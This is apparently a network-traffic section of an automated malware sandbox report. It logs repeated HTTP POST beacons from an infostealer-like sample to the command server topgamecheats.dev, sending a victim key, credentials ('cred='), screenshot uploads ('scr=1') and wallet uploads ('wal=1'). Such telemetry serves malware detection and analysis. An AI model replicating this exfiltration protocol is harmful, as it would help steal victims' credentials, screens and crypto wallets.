Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NDYxMA==Host: topgamecheats.devContent-Length: 4770Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 43 37 44 34 44 35 36 36 38 33 36 35 46 46 46 39 36 32 41 39 45 33 43 36 44 45 44 39 33 31 31 36 41 35 33 34 46 46 44 30 31 32 38 33 46 44 35 32 35 38 34 39 46 45 33 30 38 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A3C7D4D5668365FFF962A9E3C6DED93116A534FFD01283FD525849FE308
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODUzMDM=Host: topgamecheats.devContent-Length: 85455Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
